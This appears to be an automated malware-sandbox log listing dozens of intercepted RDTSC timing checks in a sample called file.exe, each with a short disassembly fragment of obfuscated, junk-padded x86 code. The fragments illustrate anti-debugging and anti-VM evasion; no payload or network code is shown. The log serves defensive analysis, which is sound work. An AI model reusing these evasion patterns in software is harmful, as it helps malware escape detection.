    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBFEF2 second address: CBFF5D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx ebx, cx 0x0000000e push ebx 0x0000000f mov di, ax 0x00000012 pop ebx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov edi, dword ptr [ebp+122D2D72h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 pushad 0x00000028 mov dword ptr [ebp+12459F8Ch], ebx 0x0000002e je 00007F72B8E40BFCh 0x00000034 mov ecx, dword ptr [ebp+124782CFh] 0x0000003a popad 0x0000003b mov eax, dword ptr [ebp+122D0171h] 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007F72B8E40BF8h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 00000015h 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b mov ebx, dword ptr [ebp+122D29F8h] 0x00000061 push FFFFFFFFh 0x00000063 nop 0x00000064 pushad 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBFF5D second address: CBFF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F72B9AA798Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1B30 second address: CC1B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4E0E second address: CC4E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4E17 second address: CC4E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5E1F second address: CC5E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8DF5 second address: CC8DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8DF9 second address: CC8E0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B9AA798Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8E0A second address: CC8E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F72B8E40BF8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D206Bh], edx 0x0000002d push 00000000h 0x0000002f call 00007F72B8E40BFAh 0x00000034 pop ebx 0x00000035 xchg eax, esi 0x00000036 jng 00007F72B8E40C0Dh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push esi 0x00000041 pop esi 0x00000042 jmp 00007F72B8E40BFBh 0x00000047 popad 0x00000048 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8083 second address: CC8150 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F72B9AA7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor edi, dword ptr [ebp+122D2C8Ah] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jnp 00007F72B9AA7988h 0x00000021 mov edi, esi 0x00000023 mov bl, 02h 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov bx, D0C4h 0x00000030 movzx edi, si 0x00000033 mov eax, dword ptr [ebp+122D0A65h] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F72B9AA7988h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 sub edi, 32439628h 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push ecx 0x0000005e call 00007F72B9AA7988h 0x00000063 pop ecx 0x00000064 mov dword ptr [esp+04h], ecx 0x00000068 add dword ptr [esp+04h], 0000001Bh 0x00000070 inc ecx 0x00000071 push ecx 0x00000072 ret 0x00000073 pop ecx 0x00000074 ret 0x00000075 nop 0x00000076 pushad 0x00000077 jmp 00007F72B9AA7996h 0x0000007c jmp 00007F72B9AA7995h 0x00000081 popad 0x00000082 push eax 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007F72B9AA7995h 0x0000008b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC288 second address: CCC2AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72B8E40BFBh 0x00000008 jp 00007F72B8E40BF6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 js 00007F72B8E40BF6h 0x0000001b pop ebx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8150 second address: CC8159 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD19C second address: CCD206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F72B8E40BF8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 or ebx, 769E4122h 0x00000029 push 00000000h 0x0000002b sub bh, 00000035h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F72B8E40BF8h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D1F41h] 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 jl 00007F72B8E40BFCh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD206 second address: CCD21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F72B9AA798Ch 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8FF1 second address: CC9012 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72B8E40BFCh 0x00000008 jg 00007F72B8E40BF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jbe 00007F72B8E40BF6h 0x0000001a jnp 00007F72B8E40BF6h 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9012 second address: CC9018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9018 second address: CC901C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD44D second address: CCD451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD451 second address: CCD455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD455 second address: CCD45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD45B second address: CCD461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3A94 second address: CD3ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F72B9AA7992h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007F72B9AA7990h 0x00000011 push edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 ja 00007F72B9AA7986h 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3ACB second address: CD3ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD596A second address: CD596F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD596F second address: CD5974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5974 second address: CD597A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B7FD second address: C6B820 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F72B8E40C15h 0x00000008 jmp 00007F72B8E40C09h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B820 second address: C6B827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD94BD second address: CD94C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F72B8E40BF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF3FB second address: CDF401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF401 second address: CDF416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F72B8E40BFCh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF416 second address: CDF441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F72B9AA7995h 0x0000000e jbe 00007F72B9AA7986h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF441 second address: CDF447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4051 second address: CE406F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 ja 00007F72B9AA7986h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007F72B9AA7986h 0x00000016 jnc 00007F72B9AA7986h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE431A second address: CE4322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE446A second address: CE4475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE88A1 second address: CE88AD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE88AD second address: CE88CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B9AA7999h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE777C second address: CE7785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7785 second address: CE778F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F72B9AA7986h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF395 second address: CAF3CB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F72B8E40C03h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c lea eax, dword ptr [ebp+1247F0A5h] 0x00000012 sbb di, AEDFh 0x00000017 xor edi, 28A23527h 0x0000001d nop 0x0000001e pushad 0x0000001f pushad 0x00000020 jno 00007F72B8E40BF6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF3CB second address: CAF3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF3D3 second address: CAF3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F72B8E40BF6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F72B8E40C05h 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF3FB second address: C99AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F72B9AA7988h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 call dword ptr [ebp+122D2672h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push esi 0x0000002d pop esi 0x0000002e pop eax 0x0000002f jmp 00007F72B9AA7996h 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF5D4 second address: CAF5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF86B second address: CAF86F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF86F second address: CAF875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF875 second address: CAF87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFAFE second address: CAFB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFB03 second address: CAFB2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B9AA7999h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F72B9AA7986h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFB2A second address: CAFB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFBA5 second address: CAFBAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFBAB second address: CAFBAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFC9E second address: CAFCD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 jmp 00007F72B9AA7998h 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jc 00007F72B9AA798Ah 0x00000019 push esi 0x0000001a pushad 0x0000001b popad 0x0000001c pop esi 0x0000001d mov eax, dword ptr [eax] 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFCD5 second address: CAFCE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFEE1 second address: CAFF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72B9AA7993h 0x00000009 popad 0x0000000a jc 00007F72B9AA798Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB02D0 second address: CB02D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0463 second address: CB0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB06E3 second address: CB0736 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72B8E40BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 mov dword ptr [ebp+122D2678h], edx 0x0000001a lea eax, dword ptr [ebp+1247F0A5h] 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F72B8E40BF8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jbe 00007F72B8E40BF6h 0x00000044 jne 00007F72B8E40BF6h 0x0000004a popad 0x0000004b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0736 second address: C9A5F6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72B9AA798Ch 0x00000008 jl 00007F72B9AA7986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push esi 0x00000012 pushad 0x00000013 jng 00007F72B9AA7986h 0x00000019 jno 00007F72B9AA7986h 0x0000001f popad 0x00000020 pop esi 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F72B9AA7988h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c mov ecx, dword ptr [ebp+122D25BBh] 0x00000042 call dword ptr [ebp+122D2A95h] 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A5F6 second address: C9A5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A5FA second address: C9A60A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F72B9AA7986h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A60A second address: C9A66C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F72B8E40BFCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F72B8E40C04h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F72B8E40BFCh 0x00000019 pushad 0x0000001a jmp 00007F72B8E40BFFh 0x0000001f jnp 00007F72B8E40BF6h 0x00000025 jmp 00007F72B8E40C06h 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A66C second address: C9A672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A672 second address: C9A676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A676 second address: C9A67A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7EB5 second address: CE7EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7EBA second address: CE7ECA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F72B9AA7986h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFF0C second address: CEFF32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F72B8E40BF6h 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F72B8E40BF6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F72B8E40C02h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF006B second address: CF0077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0235 second address: CF0241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F72B8E40BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0241 second address: CF0247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0247 second address: CF0255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F72B8E40BF6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0C75 second address: CF0C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0C79 second address: CF0C7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0E56 second address: CF0E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jbe 00007F72B9AA7986h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0E65 second address: CF0E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F72B8E40BF6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0FB1 second address: CF0FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFC19 second address: CEFC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFC1D second address: CEFC30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B9AA798Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
